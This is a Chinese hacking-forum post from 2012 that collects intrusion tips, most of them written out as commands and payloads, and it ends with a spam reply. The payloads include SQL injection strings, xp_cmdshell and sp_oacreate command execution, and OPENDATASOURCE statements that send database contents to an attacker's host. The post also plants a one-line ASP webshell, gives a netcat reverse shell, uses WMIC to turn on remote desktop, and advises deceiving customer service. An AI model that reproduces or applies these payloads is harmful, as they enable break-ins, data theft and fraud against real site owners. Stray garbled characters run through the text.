找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3502|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关0 `; ~; s1 \& Y: Y7 j% x. H
+ g+ y, d% W  Q; b. K

/ O7 M  O% @; p/ `SA点数据库分离搞法+语句:: o+ {: M) D. Z
5 l/ }" U6 R+ k
注射点不显错,执行下面三条语句页面都返回正常。0 \$ A. W+ a: A
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')8 ]6 ?) x& W- b3 \' l2 L( ~
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
+ l* t( N: m, k. H* jand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')' v: P) A3 j( |1 C( r1 K
可以列目录,判断系统为2000,web与数据库分离
' O: r& Y3 w8 {7 H; I遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
/ [0 G' E9 \( B" a在注射点上执行1 g- D. n. {( }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--; `! u' c, v5 M+ M+ M7 }8 x% g
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
( U# R3 X2 C; }0 a' K- z) X还有我用NC监听得其他端口都没有得到IP。
4 R- U# h; U. o' R2 L7 i% ]/ t# x+ Z  ~9 I7 U0 V# W% }9 k
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。. T4 q- {' U  \5 t
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--. {& O4 T1 o7 r3 w$ d. S/ u

$ |- X: n: ^1 a1 k6 x;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
4 p* |0 Y7 y( h' [" k  N! W6 f7 d8 j; [2 X% c& ^
现在就猜想是不是数据库是内网而且不能连外网。! a4 W9 c  ]: ^; q2 R. K3 i+ o$ O

% _8 [8 N, H4 o! f2 ~( Q1 ^$ T' }- s$ _( h6 j1 |3 V. X. Y  c
access导出txt文本代码" V& s9 {2 \8 \) e4 |( ?; W# A
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin8 Z  ]4 Y0 \) R

9 h6 O3 ?- G# U( M1 N3 @% Z7 {5 O$ w; l( t. f- |% d+ f6 B+ B. R

0 U) _) e5 a4 w/ `+ \4 F- D9 p自动跳转到指定网站代码头3 S7 F% C1 o, [3 o+ l$ G
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
0 T5 u+ a% y) f9 e: ^) o) Z
+ T/ O! h& y# l* J' C1 c! f$ l
7 U( u! g! n4 H1 X3 B) ]1 ~" d入侵java or jsp站点时默认配置文件路径:7 x7 t# j9 ^5 e3 e$ _* w6 v$ K, d
\web-inf\web.xml2 Q: g5 D$ M' n( i7 q3 E
tomcat下的配置文件位置:
, ^& [1 ^# V, a" x1 m6 Q8 S\conf\server.xml            (前面加上tomcat路径)! p- a. R" h! v" R# {
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml4 y$ Y( u( I5 u
9 b8 p( @! v3 ]) c: m1 w" e2 X' D
- ]6 ]" L% B0 R* E# o0 S

0 k$ p/ l9 X- o, v3 T; g# y2 B" ]检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:2 [$ p0 C3 b3 H9 U
-1%23
( Z5 K# v, N7 I2 t. w> 5 c1 Y; q( Z$ Q9 E" q9 S
<# c6 {8 ^! z/ c$ [9 d. N
1'+or+'1'='1+ c# \2 g0 P; v3 L" N
id=8%bf8 l9 N* M9 j4 l7 J) Y9 c0 ~

' z$ D$ g+ {1 ]* w3 q: h) ^全新注入点检测试法:- h2 v  a0 P6 x
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
& _5 w5 H. ^& C- U0 H' N( Y) T/ q  F' y$ V3 h6 X
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
1 Y4 V0 W* C# T  r3 f* n/ O0 M' F  @, o
搜索型注入判断方法:! K5 I: C' |# ^& J6 M
北京%' and '1'='1' and '%'='! m! t+ N/ @2 Q* E( q% S  B% o) Y4 t
北京%' and '1'='2' and '%'='+ v+ B6 N* z1 a- d" M1 q; a' E
2 x. i$ P+ I& w2 H' ~- j
/ g2 v+ m; l" k, ^, B2 z) m
COOKIES注入:
) f9 i2 d! @' ^  c6 w4 n/ \+ V: a) P9 C1 m! J
javascript:alert(document.cookie="id="+escape("51 and 1=1"));- e+ h% x, S, K
8 x/ d4 y! v# T4 O. k3 M( g8 \$ L) _
2000专业版查看本地登录用户命令:
0 q. V+ R" f; }net config workstation7 C* [7 V, o# s
6 t2 W4 W0 Q' X: C2 M- H
! g4 ~/ F5 y) z
2003下查看ipsec配置和默认防火墙配置命令:& \" t: A4 c8 a7 M, V: i
netsh firewall show config
. v# G4 p  f, N* Tnetsh ipsec static show all
- _1 n+ a4 u. R3 h7 b; p6 y& Z
/ S/ |6 b$ o. q, \不指派指定策略命令:
+ T+ j3 D& n: [+ V5 Unetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
& |/ d/ y4 k* m9 U1 P1 g$ Z  w  Lnetsh ipsec static show policy all  显示策略名  H/ D8 V; u% i2 I4 z* y1 b

" e2 q5 W- S" A
% K8 e$ u% G9 V1 f猜管理员后台小技巧:
  V# E+ r1 i- e* v5 p( jadmin/left.asp
' f0 b7 A. e# Z; W# c# S9 wadmin/main.asp8 d7 |1 f. I- H% O, a) D
admin/top.asp
- w3 p0 u2 h& E9 G, fadmin/admin.asp 1 Q* _+ W; C- K1 ?7 o
会现出菜单导航,然后迅雷下载全部链接
8 ^, X  H7 r# N, W$ l8 i* z- I$ a" E& g5 z
) z7 s" _0 d( p& p* I, ?
社会工程学:
9 y/ `  }7 S2 X  b* t, V8 B用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
# K  i* l+ N7 E5 o' S然后去骗客服
! u( H8 r) I: L% j0 V  T1 a2 D7 H' \% @: y# R

( i1 _+ d* I6 g5 p* K) W3 n统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
" V" R5 g, Y* N0 c查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, # h7 X% e) b, {. I0 w, n
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
3 m- Y$ v+ W( N
- p- R! S6 i8 O9 j  p0 `$ j4 d5 Z. N7 R5 m  v, t0 z
5 C% ?, f5 ?6 _( o* _
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
, z6 X* a" @- b* d( s
( R0 \- x0 `9 o! G
/ |4 e7 l* U; ?
0 z; ?" {) Y( \% f4 ^CMD加密注册表位置( _' }+ l3 p9 {% t8 j1 p
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor& l- Z% K. _3 Y0 X, L$ P7 d
AutoRun
. I* W& K! L+ r4 o) T
! k3 w! X% ]" ], z) D( z' ~. {$ W  J(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
  K! c" S% h7 gAutoRun" i7 K! g, ~; i
/ _/ n) V) E8 X8 n

0 T( p9 W/ {# S: _在找注入时搜索Hidden,把他改成test
% X) O4 e$ f: [8 d/ Z* ~7 o9 ~" l( c7 q& t0 I& O. b$ p: {6 M
7 I; E7 I$ h; D, m; e
# D9 z* ?$ \& ?; ~9 [5 J
mstsc /v:IP /console
4 U4 C, ]6 l- p
/ T) Q# U& f- H) ~; a. R# ?' r' Z  H( X, x# J1 E# ?% A8 S+ `% R; ~
一句话开3389:. D# m  B4 X8 ]+ b
' f# ?' k/ ~: p/ C6 h$ `
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
$ W) @$ }4 p: p# M4 ?8 L开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
/ i; R4 ^) L" B" v& |/ y. S2 l- V' k- ~" J. j: J6 u2 E) \
6 E2 D. ]/ V) V, K7 S  m: q; C# E" h
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:$ x9 _0 d4 W; K6 i8 ?
Insert into admin(user,pwd) values('test','test')& Y+ G6 ^3 v+ a

% O! B. l2 D4 X, T5 F. e; R5 g) ]- Z5 P# x) p) a
NC反弹. ]# n! m2 l' @. e0 y8 c
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   $ Z9 W9 |' }1 s  W! U+ a# [! p2 ^
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
& i# {5 n% f7 a
' a4 k( C$ I& c  O4 n( s1 x- \9 V6 u5 p% c( H5 C2 t- V: E) b  B0 g  C& F
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
5 K9 c( B  t# }8 A* _4 N: l& T3 M5 g: n% V- d: A. d* S  Y6 o
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
0 D: @4 j$ O5 h) E. a例如:
) q, {6 V2 a  z% J- C, U* t4 Fsubst k: d:\www\ 用d盘www目录替代k盘
6 ?% o, S) }# U7 L& wsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表